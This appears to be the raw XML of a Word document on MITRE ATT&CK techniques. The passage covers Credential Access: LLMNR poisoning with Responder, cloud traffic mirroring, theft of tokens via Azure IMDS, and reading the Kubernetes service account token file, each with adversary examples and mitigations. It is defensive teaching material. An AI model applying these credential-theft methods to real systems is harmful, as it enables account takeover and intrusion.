      <w:r w:rsidRPr="000B2497">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Adversary Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B2497" w:rsidRPr="000B2497" w:rsidRDefault="000B2497" w:rsidP="00053C20">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2497">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>FIN8 deployed BADHATCH malware, which created a pipe named \pipe\srvsvc to impersonate Windows’ Service Control Manager.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B2497" w:rsidRPr="000B2497" w:rsidRDefault="000B2497" w:rsidP="00053C20">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2497">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Lazarus Group used this to run code as NT AUTHORITY\SYSTEM while evading application whitelisting.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B2497" w:rsidRPr="00053C20" w:rsidRDefault="000B2497" w:rsidP="000B2497">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053C20">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B2497" w:rsidRPr="000B2497" w:rsidRDefault="000B2497" w:rsidP="00053C20">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2497">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Restrict token privileges via Group Policy (DenyImpersonationPrivilege).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B2497" w:rsidRPr="000B2497" w:rsidRDefault="000B2497" w:rsidP="00053C20">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2497">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Monitor for abnormal pipe creation (\Device\NamedPipe\).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A45289" w:rsidRPr="00264887" w:rsidRDefault="00A45289" w:rsidP="00A45289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00264887" w:rsidRPr="007A1057" w:rsidRDefault="00264887" w:rsidP="007A1057">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Credential Access</w:t>
      </w:r>
      <w:r w:rsidR="007A1057">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007A1057" w:rsidRPr="007A1057">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Tactic (TA0006)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRDefault="007A1057" w:rsidP="007A1057">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1057">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Definition: Credential Access involves techniques adversaries use to steal authentication secrets like passwords, tokens, and session cookies. Success here enables lateral movement, privilege escalation, and persistent access while evading detection. Adversaries exploit insecure protocols, software vulnerabilities, and human trust to harvest credentials from networks, applications, or browsers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRDefault="007A1057" w:rsidP="007A1057">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRPr="007A1057" w:rsidRDefault="007A1057" w:rsidP="007A1057">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1057">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>1) Technique: Network Sniffing (T1040)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRPr="007A1057" w:rsidRDefault="007A1057" w:rsidP="007A1057">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C17302">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Definition: </w:t>
      </w:r>
      <w:r w:rsidRPr="007A1057">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Adversaries passively intercept network traffic to capture credentials transmitted over unencrypted protocols (e.g., HTTP, Telnet). By placing network interfaces in promiscuous mode or abusing cloud mirroring services, they harvest authentication material like plaintext passwords or hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C17302" w:rsidRDefault="00C17302" w:rsidP="007A1057">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C17302" w:rsidRDefault="00C17302" w:rsidP="007A1057">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C17302" w:rsidRDefault="00C17302" w:rsidP="007A1057">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRPr="00C17302" w:rsidRDefault="007A1057" w:rsidP="007A1057">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C17302">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Key Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRPr="00C17302" w:rsidRDefault="007A1057" w:rsidP="00C17302">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C17302">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>LLMNR/NBT-NS Poisoning with Responder</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRPr="007A1057" w:rsidRDefault="007A1057" w:rsidP="00C17302">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1057">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mechanism: Adversaries spoof name-resolution responses (LLMNR/NBT-NS) to redirect traffic to their systems. When victims attempt to access network resources, their authentication attempts (e.g., SMB/NTLMv2 hashes) are captured.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRPr="007A1057" w:rsidRDefault="007A1057" w:rsidP="00C17302">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1057">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Adversary Example: APT28 deployed Responder to poison NetBIOS requests, harvesting hashed credentials that were later cracked for lateral movement.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRPr="007A1057" w:rsidRDefault="007A1057" w:rsidP="00C17302">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1057">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Impact: Enables SMB Relay attacks to authenticate to other systems without cracking hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRPr="00C17302" w:rsidRDefault="007A1057" w:rsidP="00C17302">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C17302">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Cloud Traffic Mirroring for Cleartext Extraction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRPr="007A1057" w:rsidRDefault="007A1057" w:rsidP="00C17302">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1057">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mechanism: Abuse cloud services like AWS Traffic Mirroring or Azure vTap to copy and exfiltrate VM traffic. TLS termination at load balancers often leaves internal traffic unencrypted, exposing credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRPr="007A1057" w:rsidRDefault="007A1057" w:rsidP="00C17302">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1057">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Adversary Example: Adversaries used GCP Packet Mirroring to capture admin credentials traversing between VMs, then exfiltrated data via Transfer Data to Cloud Account.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRPr="007A1057" w:rsidRDefault="007A1057" w:rsidP="00C17302">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1057">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Impact: Compromises cloud admin consoles or database credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRPr="007A1057" w:rsidRDefault="007A1057" w:rsidP="00C17302">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1057">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRPr="007A1057" w:rsidRDefault="007A1057" w:rsidP="00C17302">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1057">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Encrypt all internal traffic (e.g., TLS, IPsec).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRPr="007A1057" w:rsidRDefault="007A1057" w:rsidP="00C17302">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1057">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Disable legacy protocols (LLMNR/NBT-NS) and enforce SMB signing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRPr="007A1057" w:rsidRDefault="007A1057" w:rsidP="007A1057">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRPr="007A1057" w:rsidRDefault="007A1057" w:rsidP="007A1057">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1057">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>2) Technique: Steal Application Access Token (T1528)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRPr="007A1057" w:rsidRDefault="007A1057" w:rsidP="007A1057">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C17302">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="007A1057">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adversaries steal tokens (e.g., OAuth, JWT) that grant API access to cloud/container services. Tokens allow actions without passwords, often bypassing m</w:t>
      </w:r>
      <w:r w:rsidR="00C17302">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>ulti-factor authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="007A1057">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C17302" w:rsidRDefault="00C17302" w:rsidP="007A1057">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRPr="00C17302" w:rsidRDefault="00C17302" w:rsidP="007A1057">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Key Procedures</w:t>
      </w:r>
      <w:r w:rsidR="007A1057" w:rsidRPr="00C17302">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRPr="004F3158" w:rsidRDefault="007A1057" w:rsidP="00C17302">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F3158">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Azure IMDS Exploitation for Token Theft</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRPr="007A1057" w:rsidRDefault="007A1057" w:rsidP="004F3158">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1057">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mechanism: Compromise Azure VMs to query the Instance Metadata Service (IMDS) endpoint (169.254.169.254). This returns short-lived tokens for the VM’s Managed Identity, granting access to Azure services.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRPr="007A1057" w:rsidRDefault="007A1057" w:rsidP="004F3158">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1057">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Adversary Example: Attackers used AADInternals to extract tokens from compromised VMs, accessing SharePoint and Exchange data via forged OAuth sessions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRPr="007A1057" w:rsidRDefault="007A1057" w:rsidP="004F3158">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1057">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Impact: Escalates to tenant-wide admin privileges if the Managed Identity has excessive permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRPr="004F3158" w:rsidRDefault="007A1057" w:rsidP="00C17302">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F3158">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Kubernetes Service Account Token Theft</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRPr="007A1057" w:rsidRDefault="007A1057" w:rsidP="004F3158">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1057">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mechanism: Attackers in compromised containers read the /var/run/secrets/kubernetes.io/serviceaccount/token file. This token authenticates to the Kubernetes API server, allowing pod creation or secret extraction.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRPr="007A1057" w:rsidRDefault="007A1057" w:rsidP="004F3158">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1057">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Adversary Example: Peirates tool harvested service account tokens to deploy cryptomining pods in victim clusters.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRDefault="007A1057" w:rsidP="004F3158">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1057">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Impact: Enables lateral movement to cloud databases (e.g., AWS RDS) linked to Kubernetes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F3158" w:rsidRPr="004F3158" w:rsidRDefault="004F3158" w:rsidP="004F3158">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRPr="004F3158" w:rsidRDefault="007A1057" w:rsidP="00C17302">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F3158">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRPr="007A1057" w:rsidRDefault="007A1057" w:rsidP="004F3158">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1057">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Restrict IMDS access via firewall rules and use Azure Conditional Access.</w:t>
      </w:r>
    </w:p>
